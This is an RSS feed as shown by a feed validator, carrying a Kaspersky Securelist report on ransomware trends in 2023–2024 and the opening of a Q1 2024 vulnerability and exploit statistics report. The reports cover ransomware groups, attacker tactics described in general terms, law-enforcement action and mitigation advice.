Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: https://securelist.com/feed/

  1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
  2. xmlns:content="http://purl.org/rss/1.0/modules/content/"
  3. xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  4. xmlns:dc="http://purl.org/dc/elements/1.1/"
  5. xmlns:atom="http://www.w3.org/2005/Atom"
  6. xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  7. xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
  8. >
  9.  
  10. <channel>
  11. <title>Securelist</title>
  12. <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
  13. <link>https://securelist.com</link>
  14. <description></description>
  15. <lastBuildDate>Wed, 08 May 2024 15:34:19 +0000</lastBuildDate>
  16. <language>en-US</language>
  17. <sy:updatePeriod>
  18. hourly </sy:updatePeriod>
  19. <sy:updateFrequency>
  20. 1 </sy:updateFrequency>
  21. <generator>https://wordpress.org/?v=6.5.2</generator>
  22.  
  23. <image>
  24. <url>https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png</url>
  25. <title>Securelist</title>
  26. <link>https://securelist.com</link>
  27. <width>32</width>
  28. <height>32</height>
  29. </image>
  30. <item>
  31. <title>State of ransomware in 2024</title>
  32. <link>https://securelist.com/state-of-ransomware-2023/112590/</link>
  33. <comments>https://securelist.com/state-of-ransomware-2023/112590/#respond</comments>
  35. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  36. <pubDate>Wed, 08 May 2024 10:00:40 +0000</pubDate>
  37. <category><![CDATA[Publications]]></category>
  38. <category><![CDATA[Cybercrime Legislation]]></category>
  39. <category><![CDATA[Data Encryption]]></category>
  40. <category><![CDATA[LockBit]]></category>
  41. <category><![CDATA[Ransomware]]></category>
  42. <category><![CDATA[Financial threats]]></category>
  43. <category><![CDATA[Windows malware]]></category>
  44. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112590</guid>
  45.  
  46. <description><![CDATA[As Anti-Ransomware Day approaches, Kaspersky shares insights into the ransomware threat landscape and trends in 2023, and recent anti-ransomware activities by governments and law enforcement.]]></description>
  47. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" /></p><p><a href="https://securelist.com/modern-ransomware-groups-ttps/106824/" target="_blank" rel="noopener">Ransomware</a> attacks continue to be one of the biggest contemporary cybersecurity threats, affecting organizations and individuals alike on a global scale. From high-profile breaches in healthcare and industrial sectors – compromising huge volumes of sensitive data or halting production entirely – to attacks on small businesses that have become relatively easy targets, ransomware actors are expanding their sphere of influence. As we approach International Anti-Ransomware Day, we have analyzed the major ransomware events and trends. In this report, we share our observations, research, and statistics to shed light on the evolving ransomware threat landscape and its implications for cybersecurity.</p>
  48. <h2 id="ransomware-landscape-rise-in-targeted-groups-and-attacks">Ransomware landscape: rise in targeted groups and attacks</h2>
  49. <p>Kaspersky collected data on targeted ransomware groups and their attacks from multiple relevant public sources, for the years 2022 and 2023, filtered and validated it. The research reveals a 30% global increase in the number of targeted ransomware groups compared to 2022, with the number of known victims of their attacks rising by a staggering 71%.</p>
  50. <p>Unlike random attacks, these targeted groups focus on governments, high-profile organizations, or specific individuals within an organization. Moreover, most of them distribute their malware under the Ransomware-as-a-Service (RaaS) model, which involves a number of smaller groups (called affiliates) getting access to the ransomware for a subscription fee or a portion of the ransom. In the graph below, you can see the ransomware families that were most active in 2023.</p>
  51. <div id="attachment_112592" style="width: 967px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-112592" class="size-full wp-image-112592" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" alt="Most active ransomware families by number of victims, 2023" width="957" height="560" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png 957w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-768x449.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-598x350.png 598w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-740x433.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-479x280.png 479w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-800x468.png 800w" sizes="(max-width: 957px) 100vw, 957px" /></a><p id="caption-attachment-112592" class="wp-caption-text">Most active ransomware families by number of victims, 2023</p></div>
  52. <p>The ransomware most frequently encountered in organizations&#8217; systems in 2023 was <a href="https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/" target="_blank" rel="noopener">Lockbit 3.0</a>. The reason for its remarkable activity may be its builder leak in 2022. That led to various independent groups using the builder to create custom ransomware variants, which they then used to target organizations all over the world. The group itself also has a large affiliate network. Second was <a href="https://securelist.com/a-bad-luck-blackcat/106254/" target="_blank" rel="noopener">BlackCat/ALPHV</a>, which first appeared in December 2021. In December 2023, the FBI, together with other law enforcement agencies, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">disrupted</a> BlackCat&#8217;s operations and seized several websites of the group. However, immediately after the operation, BlackCat <a href="https://therecord.media/alphv-blackcat-ransomware-seized-sites-onion-tor-darkweb-fbi" target="_blank" rel="noopener">stated</a> that it had &#8220;unseized&#8221; at least some of the sites. The US Department of State <a href="https://www.state.gov/u-s-department-of-state-announces-reward-offers-for-criminal-associates-of-the-alphv-blackcat-ransomware-variant/" target="_blank" rel="noopener">offers</a> a 10 million bounty for the group&#8217;s associates. The third most active ransomware in 2023 was <a href="https://thehipaaetool.com/lessons-from-the-moveit-data-breach/" target="_blank" rel="noopener">Cl0p</a>. This group managed to breach managed the file transfer system MoveIt to get to its customers&#8217; data. According to New Zealand security firm Emsisoft, as of December 2023, this breach had affected over 2500 organizations.</p>
  53. <h3 id="other-notable-ransomware-variants">Other notable ransomware variants</h3>
  54. <p>In our threat research practice, among the threats we analyze are various ransomware samples. This section shares brief descriptions of several noteworthy families that, although not being the most active in 2023, are interesting in some way or another.</p>
  55. <ul>
  56. <li><strong>BlackHunt:</strong> Detected in late 2022 and updated in 2023, BlackHunt targets global victims using a C++ executable, which is based on Conti ransomware source code. It utilizes customizable attack vectors, including deceptive tactics like a fake Windows Update screen displayed to mask the file encryption process, and employs security measures for testing purposes, such as checking for &#8220;Vaccine.txt&#8221; before executing. If the malware author wants to test the executable without encrypting their own files, they create a Vaccine.txt file. If the malware finds this file in the system, it doesn&#8217;t proceed with encryption.</li>
  57. <li><strong>Rhysida:</strong> Emerging in May 2023, Rhysida is a new RaaS operation initially targeting <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#rhysida" target="_blank" rel="noopener">Windows</a> but later <a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-rhysida" target="_blank" rel="noopener">expanding to Linux</a>. Both versions use AES and RSA algorithms for file encryption, and the ChaCha stream cipher in the key generation process. The ransomware also implements token-based access to its hidden service for enhanced secrecy.</li>
  58. <li><strong>Akira:</strong> A compact C++ ransomware compatible with both Windows and Linux, <a href="https://securelist.com/crimeware-report-fakesg-akira-amos/111483/#akira" target="_blank" rel="noopener">Akira</a> has impacted over 60 organizations across various sectors. It employs a single key for encryption, and featured an encryption flaw in early versions, which made file decryption possible without the ransomware operators&#8217; knowledge. However, this flaw was fixed in recent variants, which are not decryptable at the time of writing this report. For victim communication, Akira utilizes a minimalistic JQuery Terminal-based hidden service.</li>
  59. <li><strong>Mallox:</strong> Also known as Fargo and TargetCompany, Mallox has been wreaking havoc since its appearance in May 2021. With an increase in attacks in 2023 and nearly 500 identified samples, it continues to evolve with frequent updates and an active affiliate program as of 2024. Operating through both clearnet and TOR servers, Mallox targets internet-facing MS SQL and PostgreSQL servers and spreads through malicious attachments. The most affected countries include Brazil, Vietnam, China, Saudi Arabia, and India.</li>
  60. <li><strong>3AM:</strong> A new RaaS variant, 3AM features a sophisticated command-line interface, and an &#8220;access key&#8221; feature for protection against automatic sandbox execution: to be executed, the ransomware requires an access key. As is the case with most human-operated ransomware, 3AM affiliates get an initial foothold in the target infrastructure using Cobalt Strike. In Cobalt Strike, they use the watermark option, which allows the attackers to uniquely identify beacon traffic associated with a specific Cobalt Strike team server. This may suggest that 3AM affiliates share access to the target with other ransomware groups, and use the watermark to separate their traffic from the others. The ransomware employs efficient file-processing techniques, such as reverse traversal (processing strings from the end to quickly identify file paths and extensions) and integration with Windows API, and terminates various processes before encryption to complicate recovery efforts. Communication with victims is through a TOR-based hidden service, though with operational security misconfigurations such as real IP exposure.</li>
  61. </ul>
  62. <h2 id="trends-observed-in-our-incident-response-practice">Trends observed in our incident response practice</h2>
  63. <p>This section contains trends and statistics based on the incidents our incident response service dealt with in 2023. The figures in this section may differ from those obtained from public sources, because they don&#8217;t cover all ransomware-related incidents that occurred last year.</p>
  64. <p>According to our incident response team, in 2023, every third incident (33.3%) was related to ransomware, which remained the primary threat to all organizations, whatever sector of economy or industry they belonged to.</p>
  65. <p>Another important trend observed in 2023: attacks via contractors and service providers, including IT services, became one of the top three attack vectors for the first time. This approach facilitates large-scale attacks with less effort, often going undetected until data leaks or encrypted data are discovered. If speaking about ransomware, trusted relationship attacks were among four of the main initial infection vectors. Another three were: compromise of internet-facing applications, which accounted for 50% of all ransomware attacks; compromised credentials (40%), of which 15% were obtained as a result of brute force attacks; and phishing.</p>
  66. <p>Among the ransomware families most frequently encountered in our incident response practice in 2023 were Lockbit (27.78%), BlackCat (12.96%), Phobos (9.26%), and Zeppelin (9.26%). Most of the data encryption attacks ended within a day (43.48%) or days (32.61%). The rest lasted for weeks (13.04%), while only 10.87% lasted for more than a month. Practically all the long ransomware attacks (those lasting weeks and months), in addition to data encryption, also featured data leakage.</p>
  67. <h3 id="ransomware-groups-tactics-and-techniques">Ransomware groups&#8217; tactics and techniques</h3>
  68. <p>Ransomware groups have continued to employ previously identified strategies for intrusion, utilizing similar tools and techniques. Adversaries have targeted internet-facing applications vulnerable to remote command execution (RCE), such as those supported by vulnerable versions of log4j. Exploiting vulnerabilities in these applications, adversaries have gained unauthorized access and compromised infrastructures.</p>
  69. <p>Once exploitation is confirmed, adversaries typically proceed by manipulating local privileged accounts responsible for application execution. They execute commands to modify user passwords and upload a set of tools, such as Meterpreter and Mimikatz, to the compromised system. By executing Meterpreter and creating or modifying system processes, adversaries gain additional access and establish persistence on the compromised system.</p>
  70. <p>In some instances, adversaries exploit vulnerabilities in public-facing applications within the organization&#8217;s infrastructure and utilize tools like BloodHound and Impacket for lateral movement within networks and gaining knowledge of the target infrastructure. However, to evade endpoint controls, they also have adopted different techniques, such as using the Windows Command Shell to collect event logs and extract valid usernames.</p>
  71. <p>Additionally, adversaries leverage native Windows SSH commands for command and control (C2) communications and data exfiltration. After identifying paths to reach remote systems with internet access, they configure SSH backdoors and establish reverse tunneling for data exchange.</p>
  72. <p>Overall, ransomware groups demonstrate a sophisticated understanding of network vulnerabilities and utilize a variety of tools and techniques to achieve their objectives. The use of well-known security tools, exploitation of vulnerabilities in public-facing applications, and the use of native Windows commands highlight the need for robust cybersecurity measures to defend against ransomware attacks and domain takeovers.</p>
  73. <h2 id="ransomware-becoming-a-matter-of-national-and-international-security">Ransomware: becoming a matter of national and international security</h2>
  74. <p>Over the past few years, the impact of ransomware attacks on public and private organizations has escalated to the point of threatening national security. This growing threat has led to ransomware being highlighted in national cybersecurity strategies, annual reports from cybersecurity regulators, and intergovernmental discussions at forums like the <a href="https://estatements.unmeetings.org/estatements/12.1255/20231211100000000/Esyr02c2qUjw/lszA98NeSJ5l_en.pdf" target="_blank" rel="noopener">UN Open-ended Working Group (OEWG) on cybersecurity</a>. The frequency and disruptive character of ransomware attacks has become unsustainable for governments, prompting them to pool resources and develop both national and multi-country initiatives to combat ransomware groups.</p>
  75. <p>One notable initiative is the formation in 2021 of <a href="https://counter-ransomware.org/" target="_blank" rel="noopener">the international Counter Ransomware Initiative (CRI)</a>, which brings together 49 countries and INTERPOL. Through the CRI, there has been a concerted effort to share cybersecurity information, disrupt attackers&#8217; operations, and tackle the financial mechanisms that fuel ransomware attacks. CRI members have also endorsed a statement advocating against ransom payments by institutions under national government authority, signaling the need for a new global norm and standard around ransomware payments. Countries like Singapore and the United Kingdom have played pivotal roles within the CRI, focusing on understanding the ransomware payment ecosystem and advocating for policies that counter ransomware financing.</p>
  76. <p>Legislative measures and policy actions are central to the fight against ransomware. In the United States, legislation like <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/cyber-incident-reporting-critical-infrastructure-act-2022-circia" target="_blank" rel="noopener">the Cyber Incident Reporting for Critical Infrastructure Act of 2022</a> aims to enhance incident reporting and resilience against attacks. In early 2023, France implemented a <a href="https://www.legifrance.gouv.fr/jorf/article_jo/JORFARTI000047046789" target="_blank" rel="noopener">law</a> that conditioned insurance coverage on the prompt reporting of cybersecurity incidents.</p>
  77. <p>State agencies reporting on ransomware indicates that fighting against this threat is a priority for authorities. In its latest <a href="https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html" target="_blank" rel="noopener">IT Security Report 2023, the BSI (Germany)</a> identifies ransomware as the biggest cybersecurity threat to Germany, noting the shift from &#8220;big game hunting&#8221; to targeting smaller companies and municipal administrations.</p>
  78. <p>Last but not least, law enforcement agencies around the globe are joining forces in operations aimed at dismantling ransomware networks. In 2023, international operations seized infrastructures of such ransomware groups as <a href="https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant" target="_blank" rel="noopener">Hive</a>, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">BlackCat</a>, and <a href="https://www.europol.europa.eu/media-press/newsroom/news/ragnar-locker-ransomware-gang-taken-down-international-police-swoop" target="_blank" rel="noopener">Ragnar</a>. Early 2024 saw Operation Cronos <a href="https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation" target="_blank" rel="noopener">disrupt</a> Lockbit and get access to their decryption keys, and in May 2024, the group&#8217;s leader <a href="https://nationalcrimeagency.gov.uk/news/lockbit-leader-unmasked-and-sanctioned" target="_blank" rel="noopener">was unmasked and sanctioned</a>. Although cybercriminals usually rebuild their infrastructure afterwards, these efforts at the very least make ransomware maintenance much more expensive and shorten their income by decrypting their victims for free. These and other efforts underscore a comprehensive approach to fighting ransomware. By combining international cooperation, legislative action, and financial oversight, countries aim to mitigate the global threat and impact of ransomware attacks effectively.</p>
  79. <h2 id="ransomware-what-to-expect-in-2024">Ransomware – what to expect in 2024</h2>
  80. <p>As we look ahead to 2024, we observe a significant shift in the ransomware ecosystem. While many prominent ransomware gangs have disappeared, smaller and more elusive groups are emerging. This rise can be attributed to leaked source code and tools from disbanded or deceased larger groups.</p>
  81. <p>As officials discuss counter-ransomware measures and law authorities around the globe link up to combat cybercrime, ransomware operations are becoming increasingly fragmented. Larger, more coordinated groups are breaking down into smaller fractions, making it more challenging for law enforcement to target them. Moreover, each of these smaller groups has less impact and is of less interest for law enforcement, thus having a reduced likelihood of being tracked and prosecuted, giving independent ransomware actors a higher chance of escaping arrest.</p>
  82. <p>In conclusion, ransomware attacks remain a significant and evolving threat in the realm of cybersecurity. From high-profile breaches affecting critical sectors to attacks on small businesses, the impact of ransomware continues to expand. As we reflect on the state of ransomware, several key observations and trends emerge.</p>
  83. <p>To mitigate the risk of ransomware attacks, individuals and organizations should prioritize cybersecurity measures.</p>
  84. <ul>
  85. <li>Use robust, properly-configured security solutions like <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a>.</li>
  86. <li>Implement <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats.</li>
  87. <li>Disable unused services and ports to minimize the attack surface.</li>
  88. <li>Keep all systems and software up to date with regular updates and patches.</li>
  89. <li>Conduct regular penetration tests and vulnerability scanning to identify and address vulnerabilities promptly.</li>
  90. <li>Provide comprehensive cybersecurity training to employees to raise awareness of cyberthreats and best practices for mitigation.</li>
  91. <li>Establish and maintain regular backups of critical data, and test backup and recovery procedures regularly.</li>
  92. <li>Use <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> to keep track of the latest TTPs used by groups and adjust your detection mechanisms to catch these.</li>
  93. <li>Pay special attention to any &#8220;new&#8221; software being run and installed on systems within your network (including legitimate software).</li>
  94. </ul>
  95. ]]></content:encoded>
  97. <wfw:commentRss>https://securelist.com/state-of-ransomware-2023/112590/feed/</wfw:commentRss>
  98. <slash:comments>0</slash:comments>
  101. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-scaled.jpg" width="2672" height="1496"><media:keywords>full</media:keywords></media:content>
  102. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-1024x573.jpg" width="1024" height="573"><media:keywords>large</media:keywords></media:content>
  103. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-300x168.jpg" width="300" height="168"><media:keywords>medium</media:keywords></media:content>
  104. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  105. </item>
  106. <item>
  107. <title>Exploits and vulnerabilities in Q1 2024</title>
  108. <link>https://securelist.com/vulnerability-report-q1-2024/112554/</link>
  109. <comments>https://securelist.com/vulnerability-report-q1-2024/112554/#respond</comments>
  111. <dc:creator><![CDATA[Alexander Kolesnikov, Vitaly Morgunov]]></dc:creator>
  112. <pubDate>Tue, 07 May 2024 10:00:39 +0000</pubDate>
  113. <category><![CDATA[Publications]]></category>
  114. <category><![CDATA[Backdoor]]></category>
  115. <category><![CDATA[Browser]]></category>
  116. <category><![CDATA[Linux]]></category>
  117. <category><![CDATA[Microsoft Exchange]]></category>
  118. <category><![CDATA[Microsoft Office]]></category>
  119. <category><![CDATA[Microsoft Windows]]></category>
  120. <category><![CDATA[Targeted attacks]]></category>
  121. <category><![CDATA[Vulnerabilities]]></category>
  122. <category><![CDATA[Vulnerabilities and exploits]]></category>
  123. <category><![CDATA[Vulnerability Statistics]]></category>
  124. <category><![CDATA[Vulnerabilities and exploits]]></category>
  125. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112554</guid>
  126.  
  127. <description><![CDATA[The report provides vulnerability and exploit statistics, key trends, and analysis of interesting vulnerabilities discovered in Q1 2024.]]></description>
  128. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We at Kaspersky continuously monitor the evolving cyberthreat landscape to ensure we respond promptly to emerging threats, equipping our products with detection logic and technology. Software vulnerabilities that threat actors can exploit or are already actively exploiting are a critical component of that landscape. In this report, we present a series of insightful statistical and analytical snapshots relating to the trends in the emergence of new vulnerabilities and exploits, as well as the most prevalent vulnerabilities being used by attackers. Additionally, we take a close look at several noteworthy vulnerabilities discovered in Q1 2024.</p>
  129. <h2 id="statistics-on-registered-vulnerabilities">Statistics on registered vulnerabilities</h2>
  130. <p>To facilitate the management of vulnerabilities, vendors can register these and assign CVE identifiers. All identifiers and related public information are published on <a href="https://cve.mitre.org" target="_blank" rel="noopener">https://cve.mitre.org</a> (at the time of writing, the site is in the process of migrating to a new domain, <a href="https://www.cve.org/" target="_blank" rel="noopener">https://www.cve.org/</a>). Although vendors often fail to register vulnerabilities, and the CVE list cannot be considered exhaustive, it does allow us to track certain trends. We analyzed data on registered software vulnerabilities and compared their quantities over the past five years.</p>
  131. <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="interactive" data-title="01 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  132. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091108/01-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  133. <p>As the chart illustrates, the number of new vulnerabilities has been steadily increasing year over year. This can be attributed to several factors.</p>
  134. <p>Firstly, the growing popularity of bug bounty platforms and vulnerability discovery competitions have provided a major impetus to research in the field. As a result, vulnerability discoveries have been on the rise. This also leads to more vendors registering the discovered vulnerabilities, resulting in a growing number of CVEs.</p>
  135. <p>Secondly, companies developing popular software, operating systems, and programming languages are implementing more security solutions and new procedures that improve the performance of vulnerability monitoring in software. On the one hand, this leads to vulnerabilities being discovered more frequently; on the other, entire categories of vulnerabilities become obsolete. As a result, both threat actors and security researchers striving to stay ahead are actively searching for new types of vulnerabilities and creating automated services that allow for even more efficient detection.</p>
  136. <p>Finally, new applications appear with time as existing ones get updates and become more complex, spawning new vulnerabilities. With the rapid pace of technological evolution, the number of discovered vulnerabilities is likely to continue to grow year after year.</p>
  137. <p>It is important to note that different vulnerabilities pose different levels of security threats. In particular, some of them may be categorized as critical. We used the data in the list of registered CVEs and the results of internal reproducibility tests to calculate the share of critical vulnerabilities.</p>
  138. <div class="js-infogram-embed" data-id="_/q1XSTSE9SXKud94bFufN" data-type="interactive" data-title="02 EN Vulnerability report graphs" style="min-height:;"></div>
  139. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs and the percentage of critical CVEs in these, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091119/02-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  140. <p>As the chart shows, the growth in the number of critical vulnerabilities has been intermittent. In 2021 and 2022, the share of critical vulnerabilities among the total number was comparable, but it increased during the periods from 2019 through 2021 and from 2022 through 2023. The year 2023 was notable for a record number of critical vulnerabilities discovered in software. The percentage of critical vulnerabilities in the total number of registered ones remained high in Q1 2024. This once again emphasizes the importance of proper patch management and the need for security solutions capable of preventing vulnerability exploitation.</p>
  141. <h2 id="exploitation-statistics">Exploitation statistics</h2>
  142. <p>This section presents exploit statistics gathered from both public sources, such as registered CVEs, and our in-house telemetry.</p>
  143. <p>An exploit is a program containing data or executable code that takes advantage of one or more software vulnerabilities on a local or remote computer for malicious purposes. Software vulnerabilities that allow attackers to gain control over the target user&#8217;s system are of the highest value to exploit developers.</p>
  144. <p>Exploits can be created by malicious actors who sell their creations on underground forums or use them to their own ends. Additionally, enthusiasts, including participants of various bug bounty programs, develop exploits to stay ahead of adversaries and devise countermeasures.</p>
  145. <div id="attachment_112556" style="width: 947px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112556" class="size-full wp-image-112556" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" alt="A dark web buy ad for zero- and one-day exploits" width="937" height="326" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png 937w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-768x267.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-740x257.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-805x280.png 805w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-800x278.png 800w" sizes="(max-width: 937px) 100vw, 937px" /></a><p id="caption-attachment-112556" class="wp-caption-text">A dark web buy ad for zero- and one-day exploits</p></div>
  146. <h3 id="windows-and-linux-vulnerability-exploitation">Windows and Linux vulnerability exploitation</h3>
  147. <p>The charts below show the trends in the number of Linux and Windows users protected by Kaspersky products who encountered vulnerability exploits in 2023 and Q1 2024. The statistics are based on data from the Kaspersky Security Network, provided by our users voluntarily.</p>
  148. <div class="js-infogram-embed" data-id="_/mqB1DB4dRydD21CtOwRd" data-type="interactive" data-title="03 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  149. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Windows users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095054/03-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  150. <div class="js-infogram-embed" data-id="_/zVTq4mF5zUc1VcatXACX" data-type="interactive" data-title="04 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  151. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Linux users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095107/04-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  152. <p>As the charts demonstrate, the number of Windows users who experienced vulnerability exploitation remained roughly unchanged throughout 2023, whereas the number of affected Linux users increased steadily. It&#8217;s important to note that this doesn&#8217;t necessarily involve the same vulnerabilities in both cases. Some vulnerabilities quickly become obsolete, prompting threat actors to shift their focus to newer ones.</p>
  153. <p>Let&#8217;s illustrate the changes in the popularity of certain vulnerabilities using the example of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28831" target="_blank" rel="noopener">CVE-2023-28831</a> vulnerability in WinRAR.</p>
  154. <div class="js-infogram-embed" data-id="_/HLfi9KXTIUf4HlJj4Omw" data-type="interactive" data-title="05 EN Vulnerability report graphs" style="min-height:;"></div>
  155. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The popularity dynamics of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28831" target="_blank" rel="noopener">CVE-2023-28831</a> vulnerability in WinRAR, September 2023 — March 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091129/05-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  156. <p>The chart reveals that the vulnerability was quite popular almost immediately after it was registered in September 2023 but then gradually declined in relevance as users installed patches. This is just further evidence that malicious actors tend to take an interest in vulnerabilities as long as the number of users who have installed a fix is relatively small.</p>
  157. <h3 id="public-exploit-statistics">Public exploit statistics</h3>
  158. <p>The availability of an exploit, especially when accessible on public platforms like GitHub, is a key criterion in assessing the criticality of a vulnerability. We analyzed data on publicly available exploits for registered vulnerabilities.</p>
  159. <div class="js-infogram-embed" data-id="_/da7IeILEkOtbflqBLPR6" data-type="interactive" data-title="06 EN Vulnerability report graphs" style="min-height:;"></div>
  160. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of vulnerabilities and the percentage of those that have an exploit, 2019 — 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091139/06-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  161. <p>The statistics reveal an increase in the total number of exploits, encompassing both ready for use and raw PoCs. The latter may be unstable but they demonstrate the possibility of exploiting the vulnerability and hold potential for future refinement. It&#8217;s worth noting that malicious actors seek both new exploits and modifications to existing ones, such as optimization for compatibility with multiple operating systems, integration of new data processing methods, and stability enhancements.</p>
